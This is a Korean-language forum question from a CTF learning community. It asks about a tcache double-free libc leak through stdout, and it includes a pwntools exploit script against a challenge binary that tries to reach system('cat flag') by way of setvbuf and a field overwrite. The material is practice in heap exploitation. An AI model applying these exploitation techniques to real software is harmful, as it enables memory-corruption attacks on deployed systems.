보상이 걸린 질문
질문에 답변을 달고 보상을 받아가세요!
해당 문제 메커니즘은 대부분 이해했는데 헷갈리는 부분이 있습니다.
더블프리를 해서 청크의 next부분을 stdout (library내의 IOstdout을 가르키는 포인터)로 덮고 alloc을 두번 해주면 library 주소가 leak된다고 하였는데,
stdout이 library영역을 가르킨다면, 청크가 할당 될 때 청크의 위치가 library 영역이 되는거고 그 청크를 프린트하면 나오는건 library 영역에 써져있는 코드여야 하는거 아닌가요?
tcache_entry구조에서 next에 들어가 있는 주소는 다음 할당할 청크의 주소일텐데, 그 청크의 주소가 libary 영역이라고 해도 우리가 프린트할 수 있는 data섹션에 담긴 값은 주소가 아닌 그저 stdoutIO를 이루는 코드인 것 아닌가요?
**#!/usr/bin/env python3
import sys
from pwn import *
BINARY_PATH = "./chal"
def conn():
if len(sys.argv) == 3:
p = remote(sys.argv[1], int(sys.argv[2]))
else:
p = process(BINARY_PATH)
return p
p = conn()
elf = ELF(BINARY_PATH)
p.sendlineafter(b'>> ',b'2')
p.sendlineafter(b'>> ',b'1')
p.sendlineafter(b'>> ',b'2')
buffer = int(p.recvline().split(b': ')[1],16)
type = buffer + 0x468
print(hex(buffer))
print(hex(type))
p.sendlineafter(b'>> ',b'1')
p.sendlineafter(b'>> ',b'139810')
p.sendlineafter(b'buffer: ', f'{int(type)}'.encode())
p.sendlineafter(b'size: ', b'5')
p.sendlineafter(b'>> ',b'2')
p.sendlineafter(b'>> ',b'0')
p.sendlineafter(b'>> ',b'1')
p.sendlineafter(b'[y/N]\n',b'2'*5)
p.interactive()**
안녕하세요 해당 문제를 풀기위해서는 setvbuf를 이용해서 풀어야한다는 점은 알고 있습니다.
다만 setvbuf에 대해서 자세히는 모르지만 디버깅을 통해 최종적으로 long type;에 (0x3232323232)22222를 넣는 방법을 찾았습니다.
if(this->type && !strcmp ((char*)(this->type), YELLOW_WIN))
system("cat flag");
해당 조건문을 통과해 최종적으로 플래그를 찾는것을 목표로하고 있습니다.
그러나 Bunker->long type에 22222를 넣어도 조건문이 통과하지 않습니다.
나름 찾은 이유는 비교문 strcmp함수에 RSI RDI에서 생각대로 레지스터에 담기질 않는것 같습니다.
나름대로 이유는 열심히 찾았지만 그 원인이 먼지 잘 모르겠습니다...
해당 문제를 풀 수 있게 지혜를 주셨으면 좋겠습니다.
감사합니다. (__)
커뮤니티 최신글
💻 해킹 부트캠프가 좋아요? 학원이 좋아요? (나에게 맞는 학습 플랫폼은?)
[0]
195
🕹 5가지 실수만 피하고 이세계 만렙 해커가 되었다 (해킹 공부할 때 많이 하는 실수, 해결하는 방법)
[0]
241
😱 해킹, 보안 공부 다들 이렇게 시작한다고? (입문 팁+해커 현실 커리어까지)
[0]
841
🚩 CTF 뉴비라면 어떻게 시작할 수 있을까요? (CTF 문제 유형, 대회 종류, 하는 법 등)
[0]
504
2025 Hot🔥보안 사건 사고 - 상반기
[1]
833
개인정보 불법유통 대응 모니터링 공고
[6]
456
2024 Hot🔥보안 사건 사고 - 하반기
[0]
2982
🔥 POC2025 스탭을 모집합니다!
[0]
39
[무료][취업연계]서울·강남 No.1 이민규 강사 진행 클라우드 풀스택 개발자 교육
[0]
122
[한국남부발전] 2025년 제 1회 영남권 사이버 공격 방어 대회
[0]
253
[새싹 SeSAC 중랑 1기] 생성형 AI를 활용한 금융 공공 IT 서비스 기획자 양성과정
[0]
113
[입문자 가능!] 6개월 만에 아이디어 → 앱출시 실전 하이브리드 앱 개발 교육 과정
[0]
148
개강 후에도 계속되는 드림핵 CTF! <CTF S7 #17>
[0]
225
🔥빡공팟 14기 해킹 방어편 모집-디지털포렌식 & 악성코드분석🔥
[0]
214